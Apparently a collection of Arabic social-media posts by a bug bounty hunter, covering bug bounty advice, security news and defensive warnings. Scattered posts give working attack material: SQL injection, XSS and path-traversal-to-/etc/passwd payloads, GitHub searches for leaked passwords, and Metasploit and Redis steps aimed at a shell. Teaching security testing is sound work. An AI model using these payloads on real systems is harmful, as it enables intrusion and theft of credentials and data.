ازاي تبدأ فى مجال ال BugBounty وتكون هاكر أخلاقي ؟؟
الشرح هنا هيكون على Web application
Bugbounty يعنى المختص بفحص المواقع
واكتشاف الثغرات الخاصه بها ويبقي مجالك اسمه penteration testing
بنقولها اختصارا pen tester
BITB Attack
نوع جديد من أنواع ال Phishing لانشاء صفحات مزوره لسرقة بيانات الضحايا
هو إختصارا ل
Browser in The Browser
بالعربي متصفح داخل المتصفح هنتعرف عليه ونعرف طريقة كشفه لانه معقد جدا لانه شبه الاصلى بنسبة ١٠٠%
Add This Time Based SQL injection payload to your list
👇👇
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
لو عاوزين تعرفوا خطورة ترك البلوتوث بتاع الموبايل مفتوح على الفاضي ومرئي
وازاى اى اتاكر ممكن يستولي على كل اللى على الموبايل بتاعك فى لحظات
تابعوا التويته القادمة
قنبلة 😅😅 🔥🔥🔥
#أمن_المعلومات
فلاش MultiBlue Dongle
وظيفتها بعد توصيلها بالكمبيوتر وعن طريق البرنامج الخاص بها تعمل Scan على اى موبايل قريب وفاتح البلوتوث وعلى الوضع المرئي وتعمل الconnection
بعد الاتصال بيكون الموبايل كتاب مفتوح للكمبيوتر يقدر يعمل copy & paste لاى حاجه
#أمن_المعلومات #الامن_السيبراني
فلاشة usb rubber duck
لو شوفت حد شايلها فى الشغل اقفش فى زمارة رقبته فورا 😅😅
لأن الفلاشه دى عليها برمجيه مخصوصه بمجرد ما تتحط فى اى جهاز كمبيوتر بتسحب جميع الباسوردات اللى عليه فى ١٠ ثوانى فقط اى باسورد متخزن على الجهاز بتسحبه
#أمن_المعلومات
إتخضيتوا من فلاش ال Rubber Duck احب اعرفكوا النهارده على الفلاشه الأخطر
Hash Bunny
قادرة على سحب الباسوردات اللى على الجهاز فى لحظات وايضا عمل Reverse connection عن طريق بايلودز محمله عليها واللى بتسمح بالتحكم الكامل بالجهاز عن بعد
RCE عن طريق
Metasploit 😉
#أمن_المعلومات
في حاله من الجدل بتظهر بين فتره والتانيه عن استخدام ال VPN و عن هل هو آمن ولا ممكن بردو بياناتك تتسرب عادى عن طريق الشركه اللى انت واخد منها vpn
هشرح فى الثريد ده ازاى تستخدمه بطريقه آمنه وتحمي نفسك فعلا وبالمناسبه انا من انصار استخدامه طبعا
#أمن_المعلومات #الامن_السيبراني
الناس اللى شغاله فى ال Network Security واختبار الاختراق للشبكات
التول دى المفروض تاخد جايزة نوبل
مينفعش تكون شغال فى المجال ده ومتستخدمهاش
👇👇👇
#أمن_المعلومات
حد سمع قبل كدا عن إختراق الprinters الطابعات 🤔
تعالوا هنتكلم النهارده عن الطابعات وازاي بيتم اختراقها وإيه المخاطر اللى ممكن تحصل وإزاي طبعا نحمي الطابعات من الإختراق
#أمن_المعلومات
الشاب اللى اخترق Uber عنده ١٨ سنه لا معاه بكالريوس هندسه ولا حاسبات ولا OSCP ولا CISSP ولا رسايل دكتوراه وماجستير
وتيجى مديحه كلينكس بتاعة ال Hr ترفض طلب توظيف شاب حديث التخرج علشان مش معاه شهادة CEH 😅😅
Better than wasting time in useless things use this :
1- login to github
2- go to search
3- write "site. com" then as you like
password or secret or any other
4- switch to recently indexed
Search and good luck you may find treasures 😉
Right reserved to my bro
@GodfatherOrwa
هل في ناس مهتمه بالصيانه والدعم الفني ؟
أقصد صيانة ال pc واللاب توب والطابعات وآلات التصوير وخلافه من الاجهزه المكتبيه
يعني لو نزلت شروحات من النوعيه دى هيكون فى مهتم ؟؟؟؟
أعزكم الله متابعي الأفاضل الكرام
النهارده هنتكلم عن أحد مجالات الCyber Security المهدور حقه نوعا ما وهو أمن الشبكات Network Security( أول شغل ليا بالسايبر كان مشروع تخرجى ٢٠٠٩ )
الثريد ده هيكون مخصص للهارد وير المستخدمه فى عملية تامين الشبكه لاحقا هنتحدث عن السوفت وير
أحد الطرق المفضله لدي بعض الاتاكرز فى عملية ادخال مالوير او فيروس لجهاز الضحايا بتكون من خلال برامج ال office 🤨
إنه ال Office Macros
ال Backdoor المفضل لدى الاتاكرز
#أمن_المعلومات
روسيا بدأت تقطيع فى اوكرانيا بمجموعة سايبر اتاك
اوكرانيا حشدت الهاكرز من كل انحاء العمل وعملوا ريمونتادا على روسيا
والحرب الالكترونيه على صفيح ساخن بينهم زيها زى اللى بيحصل على الارض بالظبط
واحنا لسه بناقش ماهو الفرق بين أمن المعلومات والأمن السيبراني 🥲
هنتكلم النهارده عن اختراق السمارت TV
اختراق التليفزيون 🤨
قد يكون الموضوع مضحك نوعا ما للبعض ويقول حتي التى في طيب هيستفيد ايه اللى هيخترقوا يعنى 🤔
هنعرف مع بعض فى الثريد ده خطورة الاختراق اللى من النوع ده والحمايه منه كما تعودنا
#أمن_المعلومات
ثريد عن ثغرة ال Log4j اللى عامله قلق ومشاكل فى العالم كله واللى من وجهة نظري الشخصيه انها احد اخطر الثغرات اللى ظهرت فى الفتره الاخيره لانها بتضرب ملايين ب RCE وبسهوله جدا
هى شغاله من امبارح ونزل باتش لها الثريد ده تحذير
هشرح طريقة ال POC وال EXPLOIT
حصل موقف فى احد الشركات موظف كان عاوز ينتقم من الشركه فعمل باسورد للملفات كلها rar zip pdf وغيرها
مينفعش كمهندس مختص فى امن المعلومات تقف مكتوف الايدي
الموضوع سهل تول john the ripper بتوفر لك الموضوع ده او حتى تكتب على جوجل
winrar password crack github
هتلاقي تولز كتيره
Rxss URL injection without need to parameter
Payload :/<%2Ftitle>1<script>alert(1)<%2Fscript>
Also with the same case some times you could hunt SQLI
So donot wait to param to test for Rxss or Sqli
Path injection or URL injection also work 🤨
عدنا والعود أحمد للثريدات والشرح من جديد
هنتكلم النهارده عن موضوع شاغل بال ناس كتير بدأت فى مجال ال BugBounty
واكثر سؤال بيتسأل بعد ما خلصت إزاي أوصل لأول ثغره واحقق اول باونتى
معلش الثريد طويل اوى ف استحملونى للاخر 🙏🏻🙏🏻
So let us start
Old but still gold Dom-Based window.location payload
to bypass 403 forbidden Due to the presence of characters known to be used in Cross Site Scripting attacks
Just some encoding
PARAMETER=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
وانت بتعمل scan وشغال ب nmap ولقيت بورت رقمه 3306 مفتوح وقف عندك فى مصيبه هنا
البورت ده هو المختص بال Mysql
الامر
nmap -p3306 <ip>
لو ظهر انه open
هتدخل على المرحله التانيه تشوف الservice وال version اللى شغاله عليه
nmap -sv -p3306 <ip>
ده ممكن نطلق عليه ال Next Generation
من ال Phishing
مواقع وروابط لها نفس الشكل بالظبط
لكن ب تول بسيطه بتحول الحروف ال Latin الى صيغة CYRILLIC ومشتقاتها
والمشابهه تماما للحروف الحقيقيه
تحديث المتصفح لاخر اصدار امر ضروري جدا علشان زى الصوره ال٣ و ٤ يظهر الاصلي
يرجي الحذر 🙏🏻
Quick tip question !!??
After you login using
User : admin
@company
.com
Password : any
Intercept > response manipulation
You find this response
What is the first thing you will do ??
With
@GodfatherOrwa
As usual 😎
The easiest and funniest P1 ever
Secure login panel
And guess what the username and password was the subdomain it self
name.example .com
user: name
password: name 😅
Copy > Paste > done 🤷♂️
Report > triagged in 30 min
Bounty 2500$
ثغرة ال Log4j كنت نزلت ثريد بيشرح طرق مختلفه وصل لها الباحثين لعمل ال poc الخاص بها
النهارده هنتكلم عنها بشكل Technical شويه
يعنى ايه JNDI
يعنى ايه LDAP
وايه اصلا قصة الثغره دى من البدايه
هنتكلم النهارده عن أحد أخطر أنواع الهجمات فى عالم ال cyber security
ألا وهو ال Supply Chain Attack 😎
معناه
ولمحه تاريخيه عنه
وليه يعتبر اخطر انواع ال cyber attacks
واوجه الشبه بينه وبين ال Ransomware attack
والحمايه منه
#أمن_المعلومات #الامن_السيبراني
Again this SQL injection due to the dev Use [ ]
if you find some thing like this send the URL to sqlmap without identify the parameter -p
and let it scan all the parameter in the URL
100% one of them will be vulnerable to SQL injection
That was my last finding
and i get good bounty on it
Payload :
/[object%20HTMLInputElement'"()&%25<acx><ScRiPt%20>alert(1)<%2fScRiPt>]
happy hunting all
Path traversal to LFI
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
Recon isnot just collecting subdomains or IPs
Recon is the most important proccess in pentesing
Recon is a magic key for all vuln different type
Great Recon = Great results
And always rember this word
(( All About Recon ))
يمكنك الحصول على نسخه من برنامج اوفيس كامله من الموقع الرسمي لمايكروسوفت مجانا بإستخدام الاميل الجامعى
Free license key for office
ابتعدوا عن تحميل اى كراك خاص ببرنامج اوفيس
معظمها ملغمة بفيروس الفديه Ransomware
ومازال الباسورد 123456 هو المتصدر رقم ١ على مستوي العالم لسنة ٢٠٢١
للعام المش عارف كام على التوالي 😅
كل مخترق عنده ملف تكست wordlist فيه عدد كبير من الباسوردات اول رقم فى الليسته هو 123456 لما بيدخلها على اى تول مع اول محاوله بينجح انه يفك الباسورد بسهوله جدا
#أمن_المعلومات
#ثريد عن تبادل الملفات بطريقه آمنه على الشبكات والانترنت للحمايه من الطرف التالت
مبدأيا مينفعش تكون شغال فى مكان حساس زى بنوك وبتداول ملف فيه مثلا حسابات العملاء بطريقه تقليديه تسمح بالسرقه لاى طرف تالت
او حتى فى مكان عادى
#أمن_المعلومات #الامن_السيبراني
كلمه قولتها وبكررها دخولك لمجال امن المعلومات او ال BugBounty علشان الفلوس ارجوك توقف واطلع منه لانك هتتعب نفسك على الفاضي ومش هتوصل لحاجه ❌
دخولك علشان تتعلم وكل يوم تضيف معلومه جديده وتطور من نفسك وتبدأ على برامج مجانيه او HOF
اتفضل كمل والفلوس هي اللى هتيجي لك لوحدها ✅
أحدث طريقة لإختراق الويندوز ظهرت من ايام قليله بتتم عن طريق ملف Word ملوش لزمه بيحمله الضحيه على جهازه CVE-2022-30190 وحتى الان مايكروسوفت لا حس ولا خبر
لا تثق فى اى ملفات توصل لك عن طريق الاميل
فى مجموعة اسمها hackers 31337
سربت على الدارك ويب يوم الاتنين ١٤٠ الف اكونت تويتر بالاميل والباسورد
وكلهم شغالين valid
المهم
زميلنا م/ محمد جمال جمع كل الاميلات المتسربه فى ملفين اكسيل
ادخل ابحث عن اميلك لو لقيته غير الباسورد فورا واتاكد انك مفعل ال 2FA
Deep fake
او التزييف العميق
هو أخطر ما وصل له مجال الذكاء الاصطناعى ال AI والى بدأ ظهوره حوالى سنة ٢٠١٧ وتتطور بشكل ملحوظ جدا وتم عمل جرائم الكترونيه باستخدامه وللاسف وصل للمنطقه العربيه طبقا لجريدة فوربس الامريكيه من يومين
ثريد قادم عن Deep fake
Stay tuned 🙂
#أمن_المعلومات
فى RCE لسه جايبها من اللى هى باتنين جنيه وربع دى 😅
Port 1099
لو لقيته مفتوح شغل Metasploit
واكتب الاوامر بالترتيب ده
use auxiliary/scanner/misc/java_rmi_server
set rhosts <ip>
run
هيفتح معاك shell نفذ امر whoami او getuid او sysinfo
وبلغ
ثريد عن طريقة نصب وسرقه جديده وصلت لى على الخاص وواضح انها منتشره فى اكتر من دوله لانى لقيتها فى احد منتديات الرانسوموير فوجب التحذير منها ونشرها علشان محدش يقع ضحيه للنصبايه الجديده دى
من ضمن ١٨ ثغره بلغتها جوجل لسامسونج فى ٤ ثغرات Click-0
بتمكن اى اتاكر انه ياخد تحكم كامل على موبايل الضحيه بمجرد انه يعرف رقم الموبايل بتاعه فقط 😀
بشرط الضحيه يكون مفعل خاصية Voice over LTE اللى فى الصوره
او خاصية Wi-Fi Direct
لسه مفيش تحديث من سامسونج
فقط وقف تفعيل الخاصيتين
O .MG charging cable
فى البدايه يبدوا انه مجرد كابل شحن عادى لكن فى الحقيقه هو كابل مخصص للإختراق بشكل احترافى
الكابل من انتاج شركة Hak5 مخصص لاعمال ال Red Teaming وممكن طبعا يستخدم استخدام شمال 😁
الكابل فى منه ٣ انواع
- Elite
- Plus
- Basic
كل نوع له مواصفات اضافيه عن الاخر
إيه رأيكم فى دى وازاى اتحدد الصفحه الاصليه من الصفحه ال phishing المزوره ؟
هو بالمناسبه موضوع جديد لكنه منتشر حاليا واكتر من شخص اتكلم عليه
يلا تحدي رمضانى خفيف
لحد ما انزل ثريد كامل يشرح الفكره وطريقة كشفها
إن شاء الله هنتكلم النهارده عن طرق تبادل الملفات الحساسه والمهمه بطريقه آمنه على الشبكات او على الانترنت بشكل عام وحمايتها من اى تدخل لطرف تالت او حتى لو تدخل هنخليها بلا قيمه بالنسبه له
Stay Tuned 🙏🏻🙏🏻
#أمن_المعلومات
معلومه مهمه
ان بنسبة ٨٠% الى ٩٠% من ثغرات Xss
هى بالأساس account takeover
بس للاسف معظمنا مركز على ال alert فقط
وضيعنا هيبة ثغرة قوية
ممكن ببايلود تعمل retrive sensitive data
وتبلغ ريبورت قوي ومحترم
عارف ان فى ناس كتير هتزعل من الكلام ده
انا ضد ال CTF بنسبة ١٠٠% لان معظم ال CTF Creator بقوا يعملوا تحديات معقده لابعد الحدود ومخالفه تماما للواقع اللى بنشوفه فى شغل السيكيورتى عموما
واتحول الهدف الرئيسي منها وهو التعلم استعدادا لمواجهة الواقع
لتعقيد غير مبرر علشان الفوز بالتحدي
فى فكرة كويسه لشركات السيكيورتى او للطلبه او المختصين بشكل عام
طبعا دلوقتى الكلام كتر عن الاختراق عن طريق ال QR code والهجمه الاشهر له وهى QRLjacking اللى هى بتمكن الاتاكر من انه يعمل jacking لل session بدل ما ال QR يدخله على صفحه معينه هو بيحوله لصفحه تانيه خاصه به
أسألكم الدعاء لأخونا الفاضل م/ ابراهيم حجازي
@Zigoo0
حدث تطور فى حالته وتم نقله للمستشفي ارجو الدعاء له فهو صاحب فضل بعد الله على عدد كبير في دخول مجال امن المعلومات
واتمنى من اى شخص يتواجد فى مكه ان يهب عمره بنية الشفاء لأخونا المحترم
روسيا بدأت سايبر أتاك كبيره على اوكرانيا
هجمة DDOS على ما اعتقد
لانها ادت لوقف خدمات ال ATM والخدمات البنكيه بشكل عام
علشان لما نقول الحرب الجايه هى حرب سيبرانيه الناس تصدق
وان كل الدول عليها الشعور ان السيكيورتى مبقاش رفاهيه وبقي امر ضرورى جدااااا
#ثريد الهندسه الإجتماعية Social Engineering
الهندسه الاجتماعيه لها اكتر من تعريف اللي بحبه وهو انها مجموعة من الطرق لإختراق عقول البشر لتجميع اكبر قدر كافي وممكن من المعلومات الخاصه بهم لاستخدامها فى تنفيذ اغراض خاصه
ايه هى الاغراض الخاصه ؟؟
#أمن_المعلومات #الامن_السيبراني
أحلم يوما ما بتأسيس وكالة الاتحاد العربي للأمن السيبرانى على غرار
The European Union Agency for Cybersecurity (ENISA)
تعقد اجتماعات دوريه تخرج بتوصيات ملزمه لجميع الدول الاعضاء لتأمين الفضاء الالكتروني الخاص بهم
الامر سهل يحتاج فقط إراده قويه
اكتشفت ان فى نوع Ransomware
(فيروس فديه)
إسمه ساره مهمته يشفر الموبايل اندرويد بباسورد عن طريق ملف apk بيحمله الضحيه
اتضح انه قديم من سنه او اكتر
احذروا من ساره (الفيروس مش الاسم) 😅
ازاى تختار لشركتك او مقر عملك انظمة الحمايه من فاير وول و ids وغيرها وانظمة تشغيل الشبكات من سرفرات وسويتشات وغيرها فى ظل حالة التحول الرقمي اللى بتشهدها معظم الدول وايه افضل منتج وايه ينصح بالتعامل معه وايه ينصح بالابتعاد عنه
#أمن_الشبكات #أمن_المعلومات #الامن_السيبراني
👇👇👇
ثريد حقيقي وحدث بالفعل عن طبيعة عمل ال Read Team فى امن المعلومات لتطبيق اختبار اختراق على بنك اوروبي مؤمن على اعلى مستوي ونجاح المحاكاه واختراق البنك ومقارنه بينه وبين اى مكان عربي وليه دايما بنقول ان مسئولية امن المعلومات هى مسئوليه جماعيه وليست فرديه
كما يحكيه اخى
@Zigoo0
اللاب توب بتاعى فاضل شويه ويشتمنى حرفيا
مشغل عليه windows 11
Linux on vmware
Ubuntu 20 on vps 😅
فى وقت واحد
معلش يا حبيبي استحمل بكره اجيب لك pc كبير من اللى بينور فى الضلمه ده 😅
Phishing .......
التصيد أو الاحتيال الالكترونى أو اصطياد المعلومات او استراق المعلومات او الخداع الالكترونى
اصل الكلمه جايه من phish بمعنى الاحتيال
و phisher هو المحتال او المخادع
عاوزين نعرف ايه انواعه وازاى نحمي نفسنا من احد اقوي جرائم امن المعلومات
#أمن_المعلومات
1- I know somone who hunt only for xss with all it's types he is now expert on it and can find it on old prog with big bounty
2- i know another hunt only for API & IDOR & Graphql
He is expert on it now and make great bounty
3- i know another use only burpsuite ( only burp )
خلى تصفحك العادى على المواقع من خلال المتصفح المربوط بال Burp وشغله فى الخلفيه
يعنى مثال لو رابط Burp على فايرفوكس
اشتغل تويتر او فيس بوك او جوجل او اى موقع من خلال فايرفوكس واترك بيرب شغال فى الخلفيه
بعدها ارجع لل http history هتلاقي ريكوستات عباره عن درر idors وليله كبيره
ثريد مجمع عن ملخص ثغرات اباتشي سيرفر طوال الاسبوعين الماضيين واخطر ما وصلت له من ثغرات عن طريق تست خاص بي او عن طريق مصادر مختلفه مؤكده
اعمل لايك وريتويت احفظه كمرجع لك فى حال قابلتك اليوم او مستقبلا
انشر الثريد باللغه العربيه اثراءا للمحتوي العربي التقني
في RCE سهله جدا لكن مشكلتها انها نادره نوعا ما وبتحتاج ضربة حظ
بس بردو نشرحها دى RCE بردو مش هزار يعنى
١- هتعمل فحص لل ports باستخدام nmap او غيره
٢- لو لقيت port 6379 مفتوح هتدخل فى المرحله التانيه ال redis
٣- الامر
redis-cli -h <ip> -p 6390
نصيحه دايما بتتقال لاى شخص لسه بيبدأ ولازم نأكد عليها
Hack to learn not learn to hack
انطلق واشتغل وجرب بايدك هنا وهنا واغلط مره واتنين واقرا وارجع اغلط واقرا تانى وارجع صلح الغلط بنفسك
مهما حد شرح لك مش هتتعلم حاجه
زي العربيه كدا عمرك ما هتتعلم القياده الا لما تجرب بنفسك 👍
أول خطوه هتكون بالكورس المقدم من م/ابراهيم حجازي كورس شامل متكامل بالعربي بيشرح فيه كل شيئ من الصفر هتتفرج عليه بهدوء وتسجل وراه فى نوت بالورقه والقلم متشتغلش عملي دلوقتى انت لسه فى البدايه استمتع به وبشرحه واتعرف على العالم الجديد اللى هتدخله
الكورس 👇👇
ثريد عن طريقة تأمين منفذ ال usb
بعد ما اتكلمنا عن خطورة ترك ال usb مفتوح فى الثريد هنا وضربنا مثال بفلاشه ال duck rubber 👇👇
الموضوع غير متوقف على الخطر ده الموضوع متوقف على مخاطر اخري منها الفيروسات مثلا لان الفلاشات اكبر حاويه للفيروسات فى العالم
فلاشة usb rubber duck
لو شوفت حد شايلها فى الشغل اقفش فى زمارة رقبته فورا 😅😅
لأن الفلاشه دى عليها برمجيه مخصوصه بمجرد ما تتحط فى اى جهاز كمبيوتر بتسحب جميع الباسوردات اللى عليه فى ١٠ ثوانى فقط اى باسورد متخزن على الجهاز بتسحبه
#أمن_المعلومات
بعد تدمير سيرفراتهم واختفائها بالكامل
القبض على اتنين من عصابة REvil
المختصه فى موضوع فيروس الفديه الRansomware
واحد منهم تم التعرف والقبض عليه بمساعدة السلطات الكويتيه
طبقا لما اعلنته وسائل اعلام امريكيه واوربيه
عاش الكويت والف تحيه وسلام 👏👏👏
#أمن_المعلومات
الخطاب الرسمي لممثل المملكة العربية السعودية بالأمس داخل مقر الأمم المتحدة :
ان الطبيعة الإلهية خلق الله من كل زوجين اثنين الذكر والانثى، وما هو غير ذلك يتعارض مع هذه الطبيعة والفطرة التي خلق الله بها الأرض ومن عليها، وان فرض قيم ومفاهيم لا تتناسب مع هذه الطبيعة الإلهية
#ثريد عن الجيل السادس من الواي فاي WIFI-6 والجيل السابع القادم WIFI-7
الثريد موجه للمختصين فى الشبكات وحتى الاشخاص الغير مهتمين بالتقنيه لانه اساس فى اختيار نوع الراوتر للمنزل او العمل
المواصفات الفنيه ومميزات ل WIFI6
مقارنه والمنتظر من WIFI7
#الشبكات #أمن_المعلومات
كنت طرحت من يوم فكرة ان ال sqli وال xss مش محتاجين برامتر بالأساس علشان ال Bug تبقي موجوده وانها ممكن تحصل من مجرد المسار فقط وده بينسف مبدأ ان البرامتر مش معمول له sanitization وبالتالى هجمة ال xss بتحصل
او ان البرامتر اللى بيستخدم شرط اساسي انه بيعمل query للداتا بيز
CVE-2022-36934
CVE-2022-27492
ثغرتين أعلنت عنهم Meta خاصين بتطبيق واتساب
الأولى بتمكن الأتاكرز انهم ينفذوا Remote code execution من خلال اتصال فيديو فقط
الثانيه بتتنفذ من خلال ارسال ملف فيديو
يرجى التأكد من تحميل اخر تحديث لواتساب
Make Sure You Update your WhatsApp
في أحد المرات كان فى واحد تحدانى انى افتح الكمبيوتر بتاعه وفعلا فتحته وكان هيتجنن ازاى عرفت الباسورد
الموضوع ببساطه غلطه بيقع فيها ناس كتير لما بتعمل باسورد للويندوز
وهو الاختيار الثالث password hint
المفروض تسيبها blank فاضيه
الاغلبيه العظمى بيحط فيها الباسورد
وهذا خطأ قاتل 😉
ظهور عصابة رانسومير جديده بتقدم خدمة
Raas (Ransomeware as a service )
اسمها ALPHV (BlackCat) وشعارها اللى فى الصوره دى
تعالوا نتعرف يعنى ايه Raas وايه حكاية الهجمه الجديده اللى هتحصل واللى بداو الاستعداد من يوم السبت اللى فات
بالنسبه الثغره دى فهى بتعمل Authbypass للأوراكل بانل اللى فى الصوره دى وطبعا هى المفروض بانل secure لدخول الموظفين المصرح لهم فقط
معملناش بحث عنها كتير لكن بما انها تابعة لشركة اوراكل اذن هتكون موجوده فى الدول العربيه عموما ودول الخليج خصوصا لان منتج اوراكل مشهور عندنا
يرجي الحذر